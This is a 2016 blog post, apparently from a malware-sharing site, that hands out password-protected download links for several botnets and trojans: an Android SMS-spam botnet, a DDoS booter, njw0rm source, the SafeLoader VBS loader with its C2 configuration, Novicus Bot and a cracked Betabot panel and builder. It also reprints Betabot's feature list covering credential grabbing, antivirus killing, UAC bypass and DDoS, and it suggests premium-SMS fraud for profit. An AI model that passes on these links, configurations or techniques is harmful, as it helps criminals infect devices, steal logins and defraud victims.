Sunday, 31 January 2016

Source Android botnet

his time I bring something very interesting I found, is a botnet for mobile phones with Android.
The main function is to infect many phone models, and then using commands, performs some action. In this case it is sending sms.
With a little thought, I came to the conclusion that he could take advantage with those pages that pay by SMS. Because if infected 50 phones and 4 messages each are sent, would make a total of 200 sms ... Imagine the money you could get with that ...
Do not expose it to do exactly that, but to study the code and to see how hard these new malwares are being futuristic.


The bot command is:

BOT: SPAM spam to {number} {message}

DOWNLOAD :https://mega.nz/#!iNtQ0RKR!OL3QPAuf5abGAJ3jeAcVTx5J5Gj5TDodHl5zNSiLXjY
PASSWORD :freetrojanbotnet.com

Snow's Booter V1 (Shell Booter)

Snow's Booter V1 FREE! (Shell Booter

DOWNLOAD: https://mega.nz/#!DVMj1Rza!W_xygWtBGgLnE_Us1l3yb3UUScUjqLPNc337saawz9w
PASSWORD: freetrojanbotnet.com

njw0rm v0.3.3 Source

njw0rm v0.3.3 Source

DOWNLOAD :https://mega.nz/#!uBljESwZ!tIkZzJNhX3FW8VW3twzVpV6_Ptn9YPd1oId3451FQ6Y
PASSWORD: freetrojanbotnet.com

SafeLoader v2.2 By Scorpio [OPEN SOURCE]

SafeLoader v2.2 By Scorpio [OPEN SOURCE]

SafeLoader v2.2 By Scorpio [OPEN SOURCE]

Features:

-Coded in VBS (Work in All Windows)
-Easy to Install
-All Traffic is Encrypted
-StartUP with Startup Folders
-StartUP with Regedit
-Startup with Windows Tasks
-GeoLocation with GeoIP
-Download & Execute
-Stable Update
-Full Uninstall
-Small Size (10Kb)
-Easy Cryptable
-Fuck UAC, SandBox and Firewall
Commands:

Download & Execute First indicates the url to the file, then the name you want to save the file, separated by "::".
For Example : http://www.site.net/file.exe::filename.exe

Update: Enter the url to the file.
Uninstall: Do not put anything, if required add a space or whatever you want.
safe.vbs is the server, you edit file

sHost = "http://www.web.net/config/gate.php"
sPassword = "Password"
sDelay = 60000
same password

config.php
$botpassword = 'neVery'; //Bot Password

safe.vbs
sPassword = "neVery"

Download  https://mega.nz/#!mc8wRDBa!K6Ty0qRL3CC00uvm_6qlMfvqBGeCgWApq3qLpwmuVho
pass: freetrojanbotnet.com

Novicus Bot Beta botnet

Novicus Bot Beta botnet
functions
[+] Mutex
[+] Anti VMware

Coder: till7
Coded: C/C++
Bot Builder in the interval must be one minute less than in the config.php!
Bot features: Download & Execute + Update

Download :https://mega.nz/#!XdEBEJCJ!KCo77HfBXQhNcAp5ApzANCCHRNSKsgg6I07sItmzSFk
password : freetrojanbotnet.com



Betabot 1.8.0.8 Panel + Builder Crack

Betabot 1.8.0.8 Panel + Builder Crack

Betabot 1.8.0.8
===================================================================

Bot
===================================================================
[x] 1. BTC Miner proactive defense mode added. You can now set a new proactive option that only blocks BTC miners. In addition, the BTC miner detection for the botkiller/pro. defense is now more accurate (#1)
[x] 2. Bot now reports whether or not a samsung/apple phone/device (galaxy, iphone, ipad, etc) was ever connected to the PC.
[x] 3. Formgrabber/DNS hooks now more compatible if existing software is hooking relevant functions. Bot will hook the callback of an already installed hook, if necessary
[x] 4. Formgrabber can now handle filters by content. Instead of specifying URLs to grab from, you can alternatively have the bot search for specific content of a POST request and upload if found (eg: *&password=*)
[x] 5. POP3 grabber now can intercept logins over SSL-protected connections around 40%+ of the time. Outlook mail client x86 supported. (#2)
[x] 6. Live login grabber (pop3/ftp) now uploads the domain the captured login was associated with instead of the IP address of the server. If the domain is unable to be determined, the IP will be sent instead. (#2)
[x] 7. "Ignore child processes of bot process" option added to botkiller
[x] 8. HIPS bypass updated for:
* Norton AV/IS (HIPS)
* ESET products (HIPS)
* Microsoft Security Essentials - Fixed HIPS issues
* McAfee av killer fixed. Several other McAfee products are now detected and disabled
* Malwarebytes Pro
[x] 9. Download task / DLL load option is now fixed. Additional options added to run a CPL file, and an option to use Rundll32.exe instead of zombifying a trusted process for the downloaded DLL
[x] 10. Extra UAC bypass method implemented. It's not undiscovered, but it's relatively unused and viable for Windows 7+. Only used when bot is injected into Windows processes.
[x] 11. Disables core components of older Betabot versions (such as persistence, botkill (sometimes) and hook restoration). This functionality can be turned on/off.


Panel
===================================================================
[x] 1. You can now view what bots completed a specific task, and also specific error/success information (if available) (#3)
[x] 2. "Quick info" expandable area added for each bot entry on the main page. You can now see slightly more info on each bot by expanding it
[/] 3. Added more statistics and some graphs regarding dead bots to the statistics page
[x] 4. Individual grabbed login entries can now be deleted
[x] 5. Added more task filter options:
* Apply task only if bot is currently marked as dirty
* Do not apply task to any bots marked as a favorite
* Apply task only on bots older than 24 hours
* Apply task only on bots older than 6 hours

[x] 6. Added 'gate filters' to security settings. You can now block bot communications by country
[x] 7. Updated geoip CSV included in panel files
[x] 8. Changed look of parts of the panel
[x] 9. Added more log options for event monitor
[x] 10. Added a few options to panel settings to help optimize / speed up page loading
[x] 11. Added a new range of options in panel settings for changing minor aspects of bot functionality
[x] 12. gate_err.txt gate debug output (logs request failures) can now be toggled on/off
[/] 13. "View bot information" page added. In addition to all the other extended information (including some new attributes), you can configure the bot to upload the system process list, autostart entries from most commonly used autostart registry locations and the installed software list. These additions will give you a much greater ability to guage the usefulness of individual machines. As time goes on, more information can be collected and uploaded if useful enough
[x] 14. Panel alerts/notices feature has more options. Users can create notices in the red alert color and also create notices that are displayed on the tasks / statistics page for greater exposure. Up to 3 notices are now displayed so responses can be viewed, and the user will be notified if more than 3 notices exist.


Fixes/Tweaks
===================================================================
[x] 1. Update functionality now slightly more reliable
[x] 2. Improved panel main bot list load time
[x] 3. Formgrab filters page now enforces filter limit. Although the bot has always refused to load a list of filters greater than 1024, now the panel actually prevents that many from ever being added
[x] 4. Fixed alignment issues on statistics page with large bot counts, as well as issue with current group display name
[x] 5. Bots marked as 'deleted' are now cleared when 'Delete dead bots' is clicked in panel settings
[x] 6. Minor changes to page numbering and the number of grabbed forms/logins displayed at one time
[x] 7. Misc tweaks made to AV killer
[x] 8. Bot now properly recognizes Windows 8.1 (as W8 on panel). Previously forgot to do this
[x] 9. Data for UDP ddos is now more randomized
[x] 10. C2 server requests optimized to consume slightly less bandwidth when bot registers with server on reboot
[x] 11. Fixed bug in formgrabber where URL filters were case-sensitive, resulting in some missed form captures if actual URL was a different case than the filter
[x] 12. Fixed a few bugs in botkiller and made some additional enhancements
[x] 13. Fixed injection issue related to low integrity processes (such as IE9+) that was causing seemingly random crashes from time to time
[x] 14. Fixed issue with memory cache support on panel where two different panels served by the same web daemon would use the same memory cache variable, thus producing very crazy results
[x] 15. Fixed encoding issue with database queries causing some characters to show up oddly
[x] 16. Fixed a bug with the login grabber sometimes (albeit rarely) mismatching credentials from different sessions
[x] 17. Fixed installation issue regarding improper DACL usage
[x] 18. Fixed issue where two updates at the same time could cause bot to corrupt installation and not come back
[x] 19. Fixed some improper uses of signed int by panel on 32-bit servers
[x] 20. Fixed by causing IP filters for tasks to not work
[x] 21. Fixed issue where log options could be unset even if user account has no privileges to view/configure logs
[x] 22. Significantly improved load time of grabbed forms/logins page
[x] 23. Made changes to reduce "duplicate bot" entries
[x] 24. Botkiller now disables unsigned BHOs for IE if option is selected. Previously was broken
[x] 25. Fixed crash issue on Windows 8 x64
[x] 26. Fixed login grab issue with 1.8.0.4 - 1.8.0.8


Notes
===================================================================
#1: A seperate option for Cryptocurrency miner proactive defense was added because the "General proactive defense" is still too effective to run successfully on a net that you download other tools to. We recommend you keep "General proactive defense" OFF unless you know what you are doing

#2: The live login grabber has undergone some relatively decent changes. First, some ssl pop3 sessions, and to a more limited degree, ftp as well, are able to be inspected. SSL POP3 grabber does not grab ALL email logins over SSL as each mail client has their own ways of handling cryptography. However Outlook and some others are supported which in turn has drastically boosted the number of relevant logins able to be captured. Valuable logins such as Hotmail/Live and GMail are now more prevelant. Lastly, if the bot is able to determine what domain was used to contact the server, it will be sent instead of the IP address.

#3: Not all tasks report more detailed information. Currently only download/update/botkill tasks are informative

#4. AVKill development has stopped for the time being and some methods have been removed. AVKill will not be nearly as effective for this reason.

requirements
================================================== ===============

1. The latest version IonCube Loader
** On all panels is binding domain

2. PHP 5.4 + MySQL

Ongoing crack . Will update soon